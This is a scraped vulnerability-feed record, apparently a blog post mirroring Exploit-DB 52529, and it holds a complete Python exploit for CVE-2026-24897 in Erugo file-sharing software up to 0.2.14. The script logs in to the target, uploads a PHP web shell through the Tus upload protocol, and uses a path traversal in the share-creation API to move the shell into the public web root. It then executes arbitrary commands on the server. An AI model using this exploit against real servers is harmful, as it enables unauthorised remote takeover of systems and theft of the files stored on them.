{“lastseen”:”2026-04-30T07:27:59″,”description”:”Exploit Title: Erugo = 0.2.14 – Authenticated Remote Code Execution RCE Date: 2026-02-02 Exploit Author: Abdul Moiz Vendor Homepage: https:\/\/github.com\/ErugoOSS\/Erugo Software Link:…”,”published”:”2026-04-30T00:00:00″,”modified”:”2026-04-30T00:00:00″,”type”:”exploitdb”,”title”:”Erugo 0.2.14 – Remote Code Execution (RCE)”,”source”:””,”references”:””,”id”:”EDB-ID:52529″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-24897″],”sourceData”:”# Exploit Title: Erugo \\u003c= 0.2.14 – Authenticated Remote Code Execution (RCE)\\r\\n# Date: 2026-02-02\\r\\n# Exploit Author: Abdul Moiz\\r\\n# Vendor Homepage: https:\/\/github.com\/ErugoOSS\/Erugo\\r\\n# Software Link: https:\/\/hub.docker.com\/layers\/wardy784\/erugo\/0.2.14\/images\/sha256-d3da70b337212a6c774b7028256870274edc2ac40536fcc0f1706cbbc4ed4fbf\\r\\n# Version: \\u003c= 0.2.14\\r\\n# Tested on: Linux (Docker)\\r\\n# CVE: CVE-2026-24897\\r\\n\\r\\nimport requests\\r\\nimport json\\r\\nimport sys\\r\\nimport time\\r\\nimport base64\\r\\nimport argparse\\r\\nimport random\\r\\nimport string\\r\\nimport warnings\\r\\nfrom datetime import datetime, timedelta, timezone\\r\\n\\r\\n# Disable SSL \\u0026 Deprecation Warnings for clean output\\r\\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\\r\\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\\r\\nwarnings.filterwarnings(\\”ignore\\”, category=DeprecationWarning) \\r\\n\\r\\nclass ErugoExploit:\\r\\n def __init__(self, target, username, password):\\r\\n self.target = target.rstrip(\\”\/\\”)\\r\\n self.username = username\\r\\n self.password = password\\r\\n self.session = requests.Session()\\r\\n \\r\\n # Standard Headers\\r\\n self.session.headers.update({\\r\\n \\”User-Agent\\”: \\”Mozilla\/5.0 (Exploit-DB)\\”,\\r\\n \\”Accept\\”: \\”application\/json\\”,\\r\\n \\”Tus-Resumable\\”: \\”1.0.0\\”\\r\\n })\\r\\n\\r\\n # Generate a random 8-char filename to prevent collisions\\r\\n rand_str = ”.join(random.choices(string.ascii_lowercase + string.digits, k=8))\\r\\n self.shell_name = f\\”{rand_str}.php\\”\\r\\n self.shell_content = ‘\\u003c?php system($_GET[\\”cmd\\”]); ?\\u003e’\\r\\n\\r\\n def get_csrf(self):\\r\\n \\”\\”\\”Initialize session cookies\\”\\”\\”\\r\\n print(\\”[*] Initializing session…\\”)\\r\\n try:\\r\\n self.session.get(f\\”{self.target}\/login\\”, verify=False, timeout=10)\\r\\n except Exception as e:\\r\\n print(f\\”[-] Connection failed: {e}\\”)\\r\\n sys.exit(1)\\r\\n\\r\\n def login(self):\\r\\n print(f\\”[*] Authenticating as {self.username}…\\”)\\r\\n url = f\\”{self.target}\/api\/auth\/login\\”\\r\\n data = {\\”email\\”: self.username, \\”password\\”: self.password}\\r\\n \\r\\n try:\\r\\n r = self.session.post(url, json=data, verify=False, timeout=10)\\r\\n if r.status_code == 200:\\r\\n token = r.json().get(\\”data\\”, {}).get(\\”access_token\\”)\\r\\n if token:\\r\\n self.session.headers.update({\\”Authorization\\”: f\\”Bearer {token}\\”})\\r\\n print(\\”[+] Login Successful.\\”)\\r\\n return True\\r\\n except Exception as e:\\r\\n pass\\r\\n \\r\\n print(\\”[-] Login Failed. Check credentials.\\”)\\r\\n sys.exit(1)\\r\\n\\r\\n def upload_payload(self):\\r\\n print(f\\”[*] Uploading {self.shell_name} via Tus Protocol…\\”)\\r\\n \\r\\n # 1. Tus Creation (POST)\\r\\n post_url = f\\”{self.target}\/files\/\\”\\r\\n \\r\\n # Base64 Encode metadata\\r\\n filename_b64 = base64.b64encode(self.shell_name.encode()).decode()\\r\\n filetype_b64 = base64.b64encode(b\\”application\/x-php\\”).decode()\\r\\n \\r\\n headers = {\\r\\n \\”Upload-Length\\”: str(len(self.shell_content)),\\r\\n \\”Upload-Metadata\\”: f\\”filename {filename_b64},filetype {filetype_b64}\\”\\r\\n }\\r\\n \\r\\n try:\\r\\n r = self.session.post(post_url, headers=headers, verify=False, timeout=10)\\r\\n if r.status_code != 201:\\r\\n print(f\\”[-] Tus creation failed. Status: {r.status_code}\\”)\\r\\n sys.exit(1)\\r\\n \\r\\n location = r.headers.get(\\”Location\\”)\\r\\n file_id = location.split(\\”\/\\”)[-1]\\r\\n \\r\\n # 2. Tus Data Transfer (PATCH)\\r\\n patch_headers = {\\r\\n \\”Content-Type\\”: \\”application\/offset+octet-stream\\”,\\r\\n \\”Upload-Offset\\”: \\”0\\”\\r\\n }\\r\\n \\r\\n r = self.session.patch(location, headers=patch_headers, data=self.shell_content, verify=False, timeout=10)\\r\\n \\r\\n if r.status_code == 204:\\r\\n print(f\\”[+] Payload uploaded. ID: {file_id}\\”)\\r\\n return file_id\\r\\n else:\\r\\n print(f\\”[-] Data upload failed. Status: {r.status_code}\\”)\\r\\n sys.exit(1)\\r\\n \\r\\n except Exception as e:\\r\\n print(f\\”[-] Upload error: {e}\\”)\\r\\n sys.exit(1)\\r\\n\\r\\n def trigger_path_traversal(self, file_id):\\r\\n print(\\”[*] Creating malicious share…\\”)\\r\\n url = f\\”{self.target}\/api\/uploads\/create-share-from-uploads\\”\\r\\n \\r\\n # Fix Date Warning: Use timezone-aware UTC\\r\\n tomorrow = datetime.now(timezone.utc) + timedelta(days=1)\\r\\n expiry = tomorrow.strftime(\\”%Y-%m-%dT%H:%M:%S.000Z\\”)\\r\\n\\r\\n payload = {\\r\\n \\”upload_id\\”: \\”exploit\\”, \\r\\n \\”name\\”: \\”exploit_share\\”,\\r\\n \\”recipients\\”: [],\\r\\n \\”uploadIds\\”: [file_id],\\r\\n \\”filePaths\\”: {\\r\\n # VULNERABILITY: Path Traversal\\r\\n file_id: f\\”..\/..\/..\/..\/..\/public\/{self.shell_name}\\”\\r\\n },\\r\\n \\”expiry_date\\”: expiry,\\r\\n \\”password\\”: \\”\\”, \\r\\n \\”password_confirm\\”: \\”\\”\\r\\n }\\r\\n \\r\\n try:\\r\\n r = self.session.post(url, json=payload, verify=False, timeout=10)\\r\\n if r.status_code not in [200, 201]:\\r\\n print(f\\”[-] Share creation failed. Status: {r.status_code}\\”)\\r\\n print(f\\” Response: {r.text}\\”)\\r\\n sys.exit(1)\\r\\n print(\\”[+] Malicious share created.\\”)\\r\\n except Exception as e:\\r\\n print(f\\”[-] Error creating share: {e}\\”)\\r\\n sys.exit(1)\\r\\n\\r\\n def execute_command(self, cmd):\\r\\n shell_url = f\\”{self.target}\/{self.shell_name}\\”\\r\\n print(f\\”[*] Executing command: ‘{cmd}’ at {shell_url}\\”)\\r\\n \\r\\n time.sleep(1) # Wait for filesystem sync\\r\\n \\r\\n try:\\r\\n r = self.session.get(shell_url, params={\\”cmd\\”: cmd}, verify=False, timeout=10)\\r\\n \\r\\n if r.status_code == 200:\\r\\n print(\\”\\\\n\\” + \\”=\\”*50)\\r\\n print(f\\”COMMAND OUTPUT:\\”)\\r\\n print(r.text.strip())\\r\\n print(\\”=\\”*50 + \\”\\\\n\\”)\\r\\n else:\\r\\n print(f\\”[-] Command failed. Status: {r.status_code}\\”)\\r\\n except Exception as e:\\r\\n print(f\\”[-] Execution error: {e}\\”)\\r\\n\\r\\ndef main():\\r\\n parser = argparse.ArgumentParser(description=’Erugo \\u003c= 0.2.14 Authenticated RCE’)\\r\\n parser.add_argument(‘-t’, ‘–target’, required=True, help=’Target URL (e.g., http:\/\/localhost:9998)’)\\r\\n parser.add_argument(‘-u’, ‘–username’, required=True, help=’User email’)\\r\\n parser.add_argument(‘-p’, ‘–password’, required=True, help=’User password’)\\r\\n parser.add_argument(‘-c’, ‘–command’, default=’id’, help=’Command to execute (default: id)’)\\r\\n \\r\\n args = parser.parse_args()\\r\\n \\r\\n exploit = ErugoExploit(args.target, args.username, args.password)\\r\\n \\r\\n exploit.get_csrf()\\r\\n exploit.login()\\r\\n fid = exploit.upload_payload()\\r\\n exploit.trigger_path_traversal(fid)\\r\\n exploit.execute_command(args.command)\\r\\n\\r\\nif __name__ == \\”__main__\\”:\\r\\n main()”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52529″,”cvss”:{“score”:10,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52529″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-30T07:27:59″,”description”:”Exploit Title: Erugo = 0.2.14 – Authenticated Remote Code Execution RCE Date: 2026-02-02 Exploit Author: Abdul Moiz Vendor Homepage: https:\/\/github.com\/ErugoOSS\/Erugo Software Link:…”,”published”:”2026-04-30T00:00:00″,”modified”:”2026-04-30T00:00:00″,”type”:”exploitdb”,”title”:”Erugo 0.2.14 – Remote…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,36,12,40,13,7,11,5],"class_list":["post-50350","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-exploitdb","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n